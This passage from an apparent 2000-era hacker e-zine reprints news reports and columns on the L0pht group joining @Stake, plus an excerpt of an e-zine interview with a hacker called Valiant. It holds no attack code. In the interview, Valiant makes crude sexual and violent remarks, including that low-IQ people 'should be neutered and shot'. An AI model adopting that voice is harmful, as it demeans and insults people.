concerns but it still obvious that they have not done their research. ZD Net http://www.zdnet.com/pcweek/stories/columns/0,4351,2421254,00.html And still others actually seem to understand. Boston Herald http://www.bostonherald.com/bostonherald/life/net01182000.htm CNN http://cnn.com/TRANSCRIPTS/0001/22/stc.00.html ABC News http://abcnews.go.com/onair/dailynews/wkn_000122_netsecurity.html ZDNet #1; -------------------------------------------------------------- This story was printed from PC Week, located at http://www.zdnet.com/pcweek. -------------------------------------------------------------- It gets really scary when hackers join security firms By John Taschek, PC Week January 16, 2000 9:00 PM PT URL: It's shaping up to be an interesting year, which in some cultures is not necessarily a good thing. First, Lotus President Jeff Papows resigns, though I'm not sure I believe anything from Papows anymore. Then Steve Jobs takes full control over at Apple, which will, of course, trigger a huge sell-off at Apple because, as everyone knows, Jobs works best when he's a front-seat driver with a back-seat title. Then China reportedly bans Windows 2000, presumably so that the country could develop an indigenous operating system based on Linux. (The Chinese government denied the report.) But by far the oddest thing to happen is that the hackers (or, as the fundamentalist technologists say, crackers) who went by the name L0pht Heavy Industries have now become full-scale security consultants. Does this bode ill for the nation's security, or what? Is everyone off their rocker? I can't believe what I'm reading. I also can't believe I'm writing about it, since dealing with people who have exhibited criminal tendencies is not a business I want to be in. L0pht was a highly publicized group of hackers who started out cracking security systems and then, somewhere along the line, became somewhat legitimate because they began to document what they were doing on the L0pht.com Web site. L0pht also develops software that allows users to crack operating system passwords in a matter of hours. To get an idea how strange it is for a security firm to hire L0pht personnel, you only need to look at the Attrition.org Web site, which highlights L0pht. Attrition's motto is, "We're easy to get along with once you learn to worship us." More damning is that L0pht has also gone on record as saying that "governments and multinational corporations are detrimental to the personal liberties on the Internet." On the other hand, L0pht's new company, called @Stake, is a specialized professional services company that will provide a full range of security solutions for the e-commerce operations of global clients. This is clearly an example of the farmer giving the fox the key to the chicken coop. I can't imagine that any legitimate startup would actually seek out L0pht. But that's exactly what has happened, as executives from Forrester Research, Cambridge Technology Partners and Compaq formed @Stake specifically to provide security services to its clients. Lo and behold, the vice president of R&D at @Stake is none other than Professor Mudge, the chief scientist at L0pht. I can just imagine Mudge hacking and cracking to his heart's content, simply to find weaknesses at those multinational companies, which then would become @Stake's new customers. Of course, the tired old argument is that L0pht performs a service by detailing flaws in systems so that companies can boost their defenses against a real, and more threatening, hacker. Hogwash, poppycock and every other early-20th-century declarative. L0pht comprised many extremely bright and talented people, and Mudge might have been the smartest of the bunch. But L0pht's history shows that the group is not ethical, maintained practices that bordered on being illegal and is simply downright scary. I wouldn't want any organization that hired the brain trust of L0pht as my security consultant. See @Stake's response to John Taschek's column. Is it better to join them if you can't beat them? Write me at john_taschek@zd.com. I encourage you to DO write him and respond to this article but do so politely, expletives and leet talk will just make us look worse and prove his point. - Ed -=- ZDNet #2 -------------------------------------------------------------- This story was printed from PC Week, located at http://www.zdnet.com/pcweek. -------------------------------------------------------------- L0pht-@Stake pact: Going legit, selling out or both? By Michael Caton, PC Week January 16, 2000 9:00 PM PT URL: http://www.zdnet.com/pcweek/stories/columns/0,4351,2421254,00.html What bothers me the most about security specialist L0pht Heavy Industries becoming part of @Stake isn't the idea of hiring hackers. It's the idea that L0pht's great, free public service is now very much for hire. The trend in the industry has been to give away, or at least subsidize with advertising, some beneficial IT resources. I can think of at least a half-dozen free IT help sites that eventually hope to make money through advertising or e-commerce. Access to security information is moving in the other direction, however, entirely because there is so much demand and so few security experts. L0pht has been a thorn in the side of many vendors; a quick look at its Web page, reveals a great tweak of Microsoft. L0pht has been known to really embarrass vendors that have not moved quickly enough to address the security holes the group finds. Access to most of the information has been free—or, according to the L0pht site, "so that system administrators, users, and software and hardware vendors may benefit from our knowledge, we share some of it with you." In the past, "some" could have meant that L0pht held information back to protect us all from the less scrupulous, but now it could be held back to help @Stake maintain a competitive advantage when consulting. Talk about unscrupulous. What will be as interesting will be to see how this security-for-hire model plays out when it comes to companies such as @Stake maintaining a competitive advantage. By going fully legit and for-profit, this could compromise relationships with hacking sources. When a security expert or hacker finds a new exploit, is the rush going to be to share it with anyone? Not if someone else is going to make money off it or hold it as confidential information to have a competitive advantage. Perhaps image and rhetoric can maintain enough good will to keep sources alive, although I'm not so sure an anarchist's mantra will convince too many people when a company's analysts bill out in the tens of thousands of dollars per week. In an industry where the nondisclosure agreement is as important as the business contract, I wonder just how well the hacking community will disclose security holes it finds when under contract to vendors. Let's face it: IT consulting companies aren't the only ones hiring hackers. Security skills can be as useful for product development as for product deployment. Hopefully, as @Stake contracts out to vendors, it has an escape clause that allows it to disclose security flaws after a certain number of business days, just to keep the vendors honest. While it is possible that L0pht will survive in spirit, the @Stake Web site, has all the polish of the best up-and-coming dot-com company looking to strike gold. Retaining the anti-establishment spirit would certainly keep it in the good graces of its sources. Do you think good security info will be held hostage to profits in the future? Write me at michael_caton@zd.com. -=- Boston Herald; Cutting to the chase: Hackers join forces with security firm to keep the world safe Net Life/Stephanie Schorow Tuesday, January 18, 2000 Which is a more revealing story? That in December a hacker calling himself Maxim broke into a server at an on-line CD store and obtained thousands of credit card numbers? Or that when Maxim posted those numbers on a Web site from which visitors could get them, one at a time, thousands reportedly did so? Must we beware the hacker in the machine - or the hacker next door? First, a look at the word ``hacker'' - it's not a synonym for ``criminal,'' just as not every locksmith is a burglar, as one hacker told me. A hacker cracks software codes to get into a company's network or Web page for the thrill of beating the system, not necessarily to cause mischief. But the movie ``War Games'' transformed a bit of MIT slang for a guy who likes to create computers into a term for someone who wants to destroy them. In popular culture, the Evil Genius Hacker has joined the Mad Scientist and Meglomaniac Who Wants to Rule the World as a standard stereotype. Fox Mulder of TV's ``The X-Files'' could not chase his aliens without illegal hacking help from the so-ugly-they're-cute Lone Gunmen, Good Guy Hackers. Hackers get a total makeover into leather-coated chic in ``The Matrix.'' But such stereotypes don't hold up in real life. The most recent Def Con - the hackers' annual meet-and-defeat confab, had, according to one on-line report, ``all the corporate professionalism of a computer mainstream industry.'' Activists, calling themselves ``white hat hackers,'' have formed a group dedicated to hacking into and shutting down kiddie-porn sites. And just two weeks ago, the famed Boston-area hacker collective - known as the LOpht - announced its merger with a start-up security company, @Stake. With founders hailing from Compaq and Forrester Research, plus $10 million in venture capital, @Stake is pure pinstripe. At LOpht, geek rules. The news intrigued me. For years, I'd heard about LOpht's expertise, its Web postings of key security flaws in Windows-based systems, about its outlaws-in-good-standing image with the so-called black hat hacker underground, and about their gizmo- and Cheez-Its-clogged warehouse. Going by hacker handles of Mudge, Dildog and Space Rogue, they've testified on lax computer security before the U.S. Senate. They embodied Bob Dylan's phrase: ``to live outside the law, you must be honest.'' When the hacker who goes only by ``Mudge'' returned my call, his voice was more lighthearted than mysterious. For a guy who supposedly has the ability to take down the Internet in 30 minutes, he was cheerfully patient with a fumbling reporter's Hacking 101 questions. What enticed LOpht to come in from the cold? Well, money, for one thing; ``we'd been looking around for various way to get the LOpht to fund itself,'' said Mudge. With @Stake's pledge not to market any specific security product, take kickbacks from vendors or interfere with LOpht's continued posting of security flaws, LOpht will be able to remain the hacker's Consumer Reports, Mudge said. LOpht's independence is invaluable to @Stake, said Ted Julian, @Stake founder and vice president of marketing: ``There's an enormous demand in the marketplace for these people.'' That's because computer security itself is transforming. As Mudge said, ``We know how to make a closed system.'' Put up a fire wall and keep people out. But with burgeoning e-commerce, systems have to remain open enough to allow consumers access to key information. Users, for example, might want to search inventories or track a delivery. Yes, Mudge asserted, ``you absolutely can'' secure such systems. You just need the right tools. Attorney General Janet Reno's recent call for a national anti-cybercrime network underscores the need for enhanced security. Hacking is changing, too. Once the domain of code-writing uber-nerds, it's been invaded by so-called script kiddies, young neophytes who attack with a point and click. ``The media actually encourages them,'' Mudge said, disgustedly. ``If you read about someone breaking into a high profile Web page, it's `a 16-year-old, brilliant misguided kid.' If a 16-year-old walked into a liquor store, shot the clerk to get the money, they never say, a `brilliant juvenile expert in spontaneous combustion.' '' For me, the most telling aspect of the Maxim hack was that afterwards no one I knew - even those who blew big bucks shopping the dotcoms - seemed spooked about e-shopping. Perhaps we've accepted a certain level of e-commerce risk. Consider: thousands of traffic accidents occur daily, but we wouldn't ban driving. We just want to keep the 16-year-old drivers under control. And we want safer roads. Which makes me glad that the LOpht is still out there. -=- CNN; Science and Technology Week Pentagon Goes Ballistic With New Defense Tests; Group of Hackers Goes Corporate; Winds of Change Stir Up New Developments in Weather Aired January 22, 2000 - 1:30 p.m. ET THIS IS A RUSH TRANSCRIPT. THIS COPY MAY NOT BE IN ITS FINAL FORM AND MAY BE UPDATED. RICK LOCKRIDGE, GUEST HOST: The Pentagon goes ballistic with new defense tests, a secretive group of computer hackers goes corporate, and the winds of change stir up new developments in weather. Those stories and more are just ahead on SCIENCE & TECHNOLOGY WEEK. Hello and welcome. I'm Rick Lockridge in for Ann Kellan. A test of a new high-tech U.S. defense system ended in failure this past week. A prototype Interceptor, designed to knock out approaching missiles, apparently sailed right past its target. Pentagon experts think they've figured out what went wrong. But as Jamie McIntyre reports, the failure is raising questions about the whole program. (BEGIN VIDEOTAPE) JAMIE MCINTYRE, CNN MILITARY AFFAIRS CORRESPONDENT (voice-over): From the launch of a target missile at night in California through the launch of an Interceptor from a sunny Pacific island, Pentagon rocket scientists thought they were looking at a slam dunk. Everything was tracking perfectly. But as they counted down to an expected mid-space collision, nothing, no flash: nothing but black space. They missed. In reconstructing the failure, Pentagon officials say they believe heat sensors the Interceptor uses to find the warm warhead failed in the crucial final six seconds. Why they don't yet know. It was a bitter disappointment after October's successful maiden test, but the Clinton administration vowed to press on, insisting some misses were inevitable. JOE LOCKHART, WHITE HOUSE PRESS SECRETARY: Obviously, if this were easy technology, they wouldn't have to test. They'd just go ahead and deploy. MCINTYRE: The $100 million test was the second of 19 planned tests of a system designed to protect the United States from a limited missile attack by a rogue nation. But only one more test is planned in the spring before the Pentagon recommends whether to invest billions more for deployment of the system by 2005. Critics insist the failure is a wake-up call that the complex missile shield is not ready for primetime. TOM COLLINA, UNION OF CONCERNED SCIENTISTS: I would say it's just another piece of evidence that's showing that you can't make a decision this summer, that the system's moving too fast. MCINTYRE (on camera): The Pentagon, stung by criticism that it may have overstated its previous success, went to great lengths this time to explain exactly what went wrong. And while insisting it can solve the technical problems, a senior military official admitted the test schedule may be overly ambitious. Jamie McIntyre, CNN, the Pentagon. (END VIDEOTAPE) LOCKRIDGE: NASA made it official this week. The Mars Polar Lander is dead. The spacecraft was designed to study the Martian atmosphere and dig up soil samples. It was due to land on Mars on December 3. But just before it entered the Martian atmosphere, it stopped sending data back to Earth, and it hasn't been heard from since. One final attempt to contact it this past week met with silence. Scientists say the Polar Lander may have burned up as it descended, or it may have crashed on mars, but they'll probably never know for sure. Two panels investigating the failure are due to report in March. Coming up later in the show: dolphins stranded in the shallows, and the rescue effort that helped turn things around. But first, some underground computer hackers surface to show what's at stake when you're online. (COMMERCIAL BREAK) LOCKRIDGE: A mysterious hacker group that's legendary in some Internet circles is going mainstream. The Boston-based group, called Lopht, is starting a company to advise big business on computer security. Our reporter Ann Kellan has known members of Lopht for two years now, and wonders how if the new corporate ties will change their lofty goals. (BEGIN VIDEOTAPE) "MUDGE", LOPHT MEMBER: We decided Lopht is now going to completely sellout, and we are going to join the mainstream. ANN KELLAN, CNN CORRESPONDENT: He gives keynote speeches to packed houses... "MUDGE": If you're looking for computer security, then the Internet is not the place to be. KELLAN: ... is invited, along with fellow group members, to testify before the U.S. Senate. He's a trained musician, and plays a mean guitar. He goes by the handle "Mudge," won't reveal his name, rank or Social Security number... "MUDGE": I don't worry have to worry about, you know, who's waiting outside of my house when I leave in the morning. KELLAN: ... and has been a member of a band of computer hackers called Lopht since 1992. UNIDENTIFIED MALE: Seven people, close quarters, on top of each other -- it's amazing that we get can actually get along without being at each others' throats. KELLAN: Headquarted in a secret warehouse near Boston, the Lopht is filled with hand-me-down equipment. Even the bathroom is wired. "WELD POND," LOPHT MEMBER: Here's our bathroom. Normally, a bathroom wouldn't be very exciting, but our bathroom has a Web browser. KELLAN: There are processors and networks, from Novell to Microsoft. UNIDENTIFIED MALE: We got it from dumpsters. We got it as, you know, people give equipment to us. KELLAN: And once they own it, they legally attack it, learning how each system works, inside and out. "WELD POND": We don't just attack Microsoft, no matter what, you know, Microsoft might say. KELLAN: Each member has area of expertise. "Weld Pond," programmer and Web guru. "Brian Oblivion" knows networks. "Silicosis (ph)" deciphers network codes. "Space Rogue" knows the inner workings of Macintosh computers. He also publishes a daily hacker newsletter on the Web. "SPACE ROGUE," LOPHT MEMBER: There a lot of things that go on that affect the hacker culture and the people that are in the hacker community that don't really get reported in the mainstream. KELLAN: "Kingpin" is a hardware expert, started hacking when he was 7, not always legally. He says Lopht helped set him straight. "KINGPIN," LOPHT MEMBER: I got into trouble for some things when I was younger, and they basically took me under their wing. They must have thought I had some good in me. UNIDENTIFIED MALE: Still do; we're just still trying to find it. KELLAN: "Dill Dog" is an ace programmer. Before joining Lopht, he made headlines in another hacker group, developing software that let's people access computers from remote locations, for good or for bad. It ticked off the likes of Microsoft, but if a system is vulnerable, Lopht's philosophy is to go public with it. "MUDGE": If you don't bring it public and if you just hand information off to the offending company, they just want to bury it, because it's cheaper for them to do that. KELLAN: Considered by many the consumer advocates of the computer world. "KINGPIN": We know the computer industry is here to stay, and we want to make security better. We want to make the industry better. KELLAN: In the hacker world, blue hairs mingle with crew cuts and criminals with feds, the cops and robbers attend the same conventions, to learn from each other -- where computer vulnerabilities are, where thieves can break in and steel everything, from bank accounts to medical records. KELLAN (on camera): How vulnerable are all the systems out there? (LAUGHTER) UNIDENTIFIED MALE: Toys can be hacked. KELLAN (voice-over): The Lopht has been an exclusive hacker playground. And now this band of hackers is going corporate, moving to white-walled offices money, getting money to buy new equipment, a place where they can do more good, says "Mudge." As far as their old stomping grounds... "MUDGE": The luxurious labs will still exist there for sometime, I'm sure, but... UNIDENTIFIED MALE: We still can't tell you where you it is. "MUDGE": Even the Lopht folks are sitting there going, we love this place, but boy, we can make something so much better. KELLAN: The move is good, and he'll stay casual and keep his personal life private, he says. But will success change Lopht's goals? UNIDENTIFIED MALE: One thing we always said about Lopht, if it stops being fun, then it's not Lopht, then it's work. "KINGPIN": It's just so wonderful to figure out how the world works around you, and especially when it doesn't. UNIDENTIFIED MALE: It is a family, that's what it is. KELLAN: For SCIENCE & TECHNOLOGY WEEK, this is Ann Kellan. (END VIDEOTAPE) LOCKRIDGE: The Lopht members say their security expertise is particularly needed in the field of e-commerce. They see a conflict there between protecting data and the need to make Web sites very easy and welcoming for cyber-shoppers. But, says one of their new corporate partners, "If you can't do security right, you can't do e- commerce right." "Mudge" agrees, and says security should no longer be just walls built to keep people out, but an element that makes everyone's job easier, from the warehouse to the delivery company to the customer. Coming up: from climate patterns to better weather detection, we'll tell with you what's making waves. (COMMERCIAL BREAK) LOCKRIDGE: Some climate researchers think there's a big change going on in the Pacific Ocean that could bring weird weather for the next 30 years. They say unusual areas of warm and cold water may mean we're entering a pattern called the Pacific Decadal Oscillation, which changes weather around the world. Anne McDermott has more. (BEGIN VIDEOTAPE) ANNE MCDERMOTT, CNN CORRESPONDENT (voice-over): Painting the lawn: Another wacky California custom? Well, no. This was back in the late '80s, when a drought burned up all the grass. Eventually, though, the vegetable dye was washed away by El Nino. But it may be time to get out that green dye again, because according to the experts, more drought is on the way. And that's because of a natural recurring climate pattern over the Pacific Ocean called Pacific Decadal Oscillation, or PDO for short. Unlike El Nino, which only sticks around a year or two, PDO is a much bigger phenomenon, and one that waxes and wanes over the course of 20 to 30 years. Scientists monitoring this PDO say it steers the jet stream over North America and will result, they say, in lots more rain in the Northwest part of the United States and less than normal rainfall in the Southern part of the country. WILLIAM PATZERT, JPL OCEANOGRAPHER: When the Pacific speaks with events like this, Pacific Decadal Oscillation, the United States definitely listens. MCDERMOTT: How severe droughts will be is by no means possible to determine, but expect a renewed interest in those low-flow showerheads and those water-skimping toilets. No one's forgotten rationing or the sacrifices. UNIDENTIFIED MALE: Not being able to wash down my driveway and wash my car. MCDERMOTT: Now this PDO is not related to global warming, but its reach may be global. Scientists say it's possible that the PDO played a part in the terrible flooding in Venezuela last year and in those wind storms that battered Europe late last month. But mostly, this climate pattern will affect the U.S. In fact, it's already happening. Scientists say New England's long wait for that first big snow is related to the PDO. Next up: well, at least some periods of drought in some parts of the country, though it's unlikely it'll make anyone yearn for the return of El Nino. For SCIENCE & TECHNOLOGY WEEK, I'm Anne McDermott, CNN, Los Angeles. (END VIDEOTAPE) LOCKRIDGE: If we're going to have strange weather in the next few years, at least forecasters may be able to give us a bit more warning of what's coming. The National Weather Service has a brand new computer, and officials say it will make predictions faster and more accurate. Natalie Pawelski reports. (BEGIN VIDEOTAPE) NATALIE PAWELSKI, CNN CORRESPONDENT (voice-over): Predicting this week's snowstorms and bitter cold and forecasting the hurricanes and tornadoes of warmer months has just gotten easier, says the National Weather Service, thanks to a new supercomputer. JACK KELLY, NATIONAL WEATHER SERVICE: We're starting off today with a much -- a five-times-faster computer than we've had, and by September, it will be about 28-times faster than the one we currently have. So. we're able to do better simulations of the atmosphere. PAWELSKI: The Weather Service says the new computer will give people more lead time to prepare for severe storms, and it's designed to run increasingly-complex forecasting models that predict what's coming with ever-greater detail. KELLY: What's that mean for everyone? It means more accurate forecasts, longer-time forecasts and more accurate, both temperature, rain, you name it; it's going to be better than what we've been able to do. PAWELSKI: They say everybody talks about the weather but nobody does anything about it. The new computer should allow people to talk about coming weather further in advance. And while we still can't do anything about it, at least we can be better prepared. For SCIENCE & TECHNOLOGY WEEK, I'm Natalie Pawelski. (END VIDEOTAPE) LOCKRIDGE: Coming up next: surfing the Web and the water. We'll travel to Florida for a marine mammal mystery, then introduce you to an older generation learning some new technology. (COMMERCIAL BREAK) LOCKRIDGE: Skywatchers with clear weather got a spectacular show on Thursday night. A total lunar eclipse made the full moon glow an eerie shade of red over North and South America. This was the first time in four years that the Sun, Earth and Moon lined up just right to produce this kind of show. It happens when the Earth's shadow blocks most of the Sun's rays from lighting up the Moon. The next full lunar eclipse will be in July, and the best viewing for that one will be from Asia and Australia. Marine biologists in the Florida keys are trying to solve a mystery. Starting last weekend, dozens of bottle-nosed dolphins began stranding themselves on tidal flats. They included both healthy and sick animals, and scientists are trying to figure out just what drove them so close to shore. Reporter Mike Tobin, from our affiliate WSVN, has the story. (BEGIN VIDEOTAPE) MIKE TOBIN, WSVN REPORTER: Hours and hours of desperate, exhaustive labor got rescuers to the point where they finally chased the dolphin out into open water. CHRIS BLANKENSHIP, MARINE BIOLOGIST: It's nice to see him go offshore, but whether they get stranded again, we don't know. TOBIN: Without warning, dolphins started coming ashore, not just on Long Key, but on the west coast of Florida. These dolphins ran aground at Aresnicker (ph) Bank, about five miles off Long Key. So necropsies are being performed on all the dolphin that died to see if there was an illness or toxin which caused this. BRAD LANGE, LAYTON, FLORIDA FIRE DEPARTMENT: Something's obviously going on. Right now, we're checking dolphins out, and hopefully we'll know more later on. TOBIN: There were two efforts going on in the water, one to nurse the ill, exhausted or injured back into swimming shape, and two, to scare the healthy dolphin into the open sea, but the first attempts at human chains were unsuccessful. The healthy dolphin kept coming back. Then someone came up with a theory that this was tightly knit pod of dolphin, and the sick ones were calling for help. BLANKENSHIP: Sometimes animals will, when they congregate together as a family, if you get a couple of sick ones, and they have this feeling of responsibility, at least in my mind, you know, they have to take care of the animals that are sick. TOBIN: So they moved the sick ones to a tank onshore, where they couldn't communicate with the other dolphin. Sadly, one of those died when it was moved. DENISE JACKSON, WILDLIFE RESCUE: We have had scenarios that once the injured and the sick ones died, the healthy ones did leave. TOBIN: Then the volunteers formed a human chain again, this time with kayakers in front. With buckets of fish on their legs, they would try to act like the Pied Piper, tempting the dolphin out to sea. With all the people behind them scaring the dolphin, the survivors made it to the open water, where they can't be injured or trapped by the sharp corral the in the shallow water of the Keys. LANGE: We consider this a great success because there could have been a lot of them expired. (END VIDEOTAPE) LOCKRIDGE: That report from Mike Tobin, of our affiliate WSVN. When you imagine a typical Internet user, you might think of a teenager endlessly chatting with friends, or a young business tycoon checking stock prices on a Palm Pilot. But the Internet's not just for the young. As Don Knapp reports, it's keeping some senior citizens young at heart. (BEGIN VIDEOTAPE) DAVID LANSDALE, GERIATRICS EXPERT: So let's go down one more, push your enter key. DON KNAPP, CNN CORRESPONDENT (voice-over): David Lansdale's found a way to spark up the lives of the elderly. He gets them wired to the Internet. LANSDALE: Now one more. Now type "au." UNIDENTIFIED FEMALE: I thought maybe I was through with life, I was ready for a rocking chair because I was 86 years old, and I haven't found the rocking chair yet. KNAPP: The average age of Lansdale's students is around 68. All are in nursing or assisted care homes. He used family relationships to introduce them to the Web. LANSDALE: Here they are in California, a family was back in New York. The opportunity for them to connect, to cross that time and space, was an incredibly-precious opportunity to them. UNIDENTIFIED FEMALE: I hear you are so beautiful. KNAPP: Lillian Sher (ph) dictates an e-mail to a newborn great granddaughter. Working with one another, the seniors learn as a group, to both master the Internet and overcome what Lansdale calls the maladies of the institutionalized: loneliness, helplessness, boredom and cognitive decline. MARY HARVEY, WEB SURFER: Bingo just doesn't appeal to me, but this does. Believe me, this does. (LAUGHTER) KNAPP: Ninety-four year-old Ruth Hyman is a star pupil and an instructor. RUTH HYMAN, INTERNET INSTRUCTOR: When I sent a letter to my grandchildren, a great grandchildren, they hanged it up in their offices, just like I used to hang their drawings on my refrigerator. LANSDALE: There's a collective benefit, there is an element of -- a tremendous element of therapy. And remember that we started as a support group. DIXON MOOREHOUSE, WEB SURFER: I just wished I was 15 years old and getting to learn all this. LANSDALE: The seniors call their weekly meetings Monday Night Live, and many say it's given them new life. HYMAN: Three years ago they told me I wasn't going to live, but I showed them. I got on the Web and got work, and I worked ever since. KNAPP: For SCIENCE & TECHNOLOGY WEEK, I'm Don Knapp. (END VIDEOTAPE) LOCKRIDGE: Thanks for joining us. I'm Rick Lockridge, in for Ann Kellan. Next week: technology evolution and how it affects you. The digital age has produced lots of new businesses and is threatening to kill off some old ones. It's survival of the fittest, where the losers become techno-saurs. That's coming up on the next SCIENCE AND TECHNOLOGY WEEK. We'll see you then. TO ORDER A VIDEO OF THIS TRANSCRIPT, PLEASE CALL 800-CNN-NEWS OR USE OUR SECURE ONLINE ORDER FORM LOCATED AT www.fdch.com -=- ABC News; By Bill Redeker Jan. 22 — Computer crime is on the rise. And as more people start purchasing online, entrusting their credit card numbers and other personal details to the ether, many experts say it is time to step up the battle for online security. “You don’t even have to be a really knowledgeable intruder, you can just use one of these tools that are out there and break into a system,” says Kathy Fithin of the Computer Emergency Response Team at Carnegie Mellon University in Pittsburgh. Last year the Response Team received reports of more than 8,000 Internet attacks and intrusions. Connecticut-based CD Universe reported it received a fax from a hacker describing himself as a 19-year-old from Russia. The hacker offered to destroy the credit card files he had accessed through a flaw in the software for $100,000. When CD Universe passed up the offer, the hacker retaliated by posting up to 25,000 numbers on a Web site called Maxus Credit Card Pipeline. Card Numbers Cause Alarm “What’s interesting about this case is the sheer scale of the crime. The person claims to have 300,000 credit cards, which is an enormous amount,” says security expert Elias Levy. Discover Financial Services, Visa, MasterCard and American Express are all working to get new cards to the customers compromised by the Russian hacker. The Maxus incident is bound to reignite consumer concern over online security. At least 30 businesses are compromised every day, according to ABCNEWS research. The problem has led to a boom in computer security firms. @Stake, a security firm in Boston, went to the source and hired eight of the most prominent hackers in the country, a group called L0pht Heavy Industries. The L0pht crew consider themselves “gray-hat” hackers. Unlike black-hat hackers such as Maxus and white-hat vigilante hackers who sabotage kiddie-porn sites, L0pht identifies security flaws publicly then dares companies to fix them. Several L0pht members have testified in Congress about online security. They’ll be helping @Stake design systems that even they can’t penetrate. “I think we really understand how people break into computer systems because we do it ourselves,” said Weld Pond, a L0pht member. Hackers vs. hackers: it may be the face of the future. @HWA 48.0 HNN: Jan 24: Several New Ezine Issues Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I really hoped to review at least one of these for this issue but the sites are so damn slow or over crowded I couldn't reach them so hopefully next issue i'll have some snippets/a review for you - Ed From HNN http://www.hackernews.com/ contributed by Armour, The Hex, and others New editions of several underground e-zines have been released. InET from Columbia in both English and Spanish, Issue #1 of Hack in the Box, Quadcon #3 from Australia and DataZine 0.01 from the folks at Datacore have hit the streets. Get your copies now! InET http://www.warpedreality.com/inet Hack In the Box http://www.thelimit.net/hitb Quadcon http://landfill.bit-net.com/~quadcon/quadcon-3.txt DataZine http://www.tdcore.com If anyone else manages to get through and wants to write a review on these (or any other zine, even if its your own *G*) go ahead and email it in and i'll post it in the zine. - Ed Here's a taste of Quadcon by Amour from Australia (Issue #1) **************************************************************************** ***************************<-=- QuadCon -=->******************************** **************************************************************************** *************The Newsest Zine To Hit Australia And The World**************** */*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/ */*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/ ============================================================================ December 1999 - Issue 1 ============================================================================ Whats In This Issue: # Halcon Hacker Valiant Gives QuadCon An Exclusive Interview And Some Special Tips In Trying To Prevent Your Machine From Being Hacked =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The Interview Of Valiant The Leader Of Halcon. | http://www.halcon.com.au ---------------------------------------------- BackGround: Halcon was founded in 1993 as a Bulletin Board System and by 1996 had grown to atleast ten members. Still growing, in October 1996 the group took on the name Halcon Technologies and in 1997 Valiant registered a business name, allowing them to register the halcon.com.au domain name. Although the group was not widely known, on 22nd October 1999, Halcon was blamed for a massive hack on the Australian Republican Movement website. Despite denials and misquotations, the story was covered by news outlets, an example of which is at the following URL: http://www.halcon.com.au/arm0001.html Following this incident, Halcon received massive amounts of publicity (most of it was unwanted) and Valiant claims that Halcon has become the most popular hacking group in Australia. It currently has 24 members and thousands of supporters. Having been misquoted once, Valiant has since denied all interviews to the press, including an offer from Channel Nine. QuadCon is therefore proud to present an exclusive, uncut interview with Valiant. ------------------------------------------------------------------------------- The Interview ------------- QuadCon: If you were a system administrator of a newly installed slackware linux machine and you had 20 minutes to secure it what would you do? Valiant: Go to all the available sites (www.halcon.com.au/links.html) that cater for that, and quickly grab and install as many patches for your software available. Close all services (especially fingerd) that arn't needed, relocate telnet to a different port (I know it breaches RFC's, but fuck it.) and make sure that you don't adduser lamers. :) QuadCon: What is the most common thing to hack to gain access to? Valiant: Fingerd is the most exploitable feature on machines, the good old crackers highway. Allthough these days it's neglected as a mode of system penetration, also alot of sysadmins don't understand the point of finger anymore and remove it anyway. As for hacking, the best method available that I remember overusing would be a buffer overflow in a certain software which makes calls to root. Flood the software, bang, down it goes and you have root. :) QuadCon: Does the name Halcon have any relavence to you and why did you choose it for the name of the group? Valiant: Halcon .. well, I chose that many years ago, so I can't really remember why it was chosen, other than that it sounds funky. :P QuadCon: How would you characterize the media coverage of you? Valiant: Trivial and biased. They just want an 'evil hacker genious' who brags about how he hacked NASA, they don't really like me as basically I won't brag, and I prefer to explain how idiotic the consumers are for purchasing fucked computers, etc, and other consumer related problems. QuadCon: What do you think about hacks done in your name--for instance, the Australian Republican Movement hack? Valiant: I wasn't expecting such media coverage on that topic, however they have no evidence against me, and I have yet to admit to even being born at this point in time. So fuck 'em all. :) QuadCon: What's the biggest misconception perpetuated by Hollywood cybermovies? Valiant: There is no such thing as a hot female hacker named Acid Burn who has pert tits and lips that would look very nice wrapped around my hard disk. :) QuadCon: In your own words, define hacker. Valiant: There's two meanings. I fall into both. The code hacker, who lives to program and does it the hard way, and the system hacker, who loves finding exploitable features in systems to gain access, does so, notifies the sysadmin and patches the hole. QuadCon: What is your technical background. (Which platform do you prefer PC/MAC? What is your online background? Do you do networking? Do you know programming languages,etc.) Valiant: At the moment my prefered operating system is Windows 98 due it's usability and comprehensive system architecture, when it comes to personal use, for industrial things such as networking, I prefer any linux distribution. I am a PC user, allthough I have a few old Apple Classics in my computer collection. I've been using the internet through BBS gateways for ten or more years. I network when I have to, but I used to work as a network engineer. As for programming languages, I have a bad memory and generally have to 'relearn' things when I need them, however it's more a refresh than a relearn. :) QuadCon: I understand that hackers assume an online nickname to become known by - how did you acquire your nickname? Valiant: I was seven years old when I logged onto a BBS using an audio coupler 900 bps modem at a friends place. It asked for a handle, Valiant was my current dungeons and dragons charracter, so I typed it in sheepishly. I've been known by it ever since. :) QuadCon: What do you portray system administrators are like? Valiant: Fail-safe devices that take care of systems, that if programmed correctly would never need human assistance. :) QuadCon: What do you think of ALOC, another aussie hacking group? Valiant: Who? :) QuadCon: What currently is Halcon working on? Valiant: Currently working on? We're currently working on the ultimate encyclopeadia of how to be slothenly and lazy. :) QuadCon: What would you like Halcon to be in the future? Valiant: I don't know, that's a hard question really. I never wanted it to be anything to begin with, time has just made it bigger than I ever expected. Back when I was a kid and it first started, I never really thought it would exceed a BBS group of users who were of the same interests. Now it's allmost like a religious cult for some. :) QuadCon: Who in the world do you dislike most? Valiant: Anyone with an IQ under 110. :) 100 is average, so I like people a tad over. The others should be neutered and shot. :) QuadCon: Any last comments? Valiant: I like being a cunt-rag. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Special Thanks -------------- Valiant of Halcon http://www.halcon.com.au =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Support Us ---------- Please support us - we are looking for a fast permanent unix box to host a website with all our zines on. If you believe you can help see the contact section below. Also if you know anyone who wants or deserves to be interviewed also see the contact section below. 